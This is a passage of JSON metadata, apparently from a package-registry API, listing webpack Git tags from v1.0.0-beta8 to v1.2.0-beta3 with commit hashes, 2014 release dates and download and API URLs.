anifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url"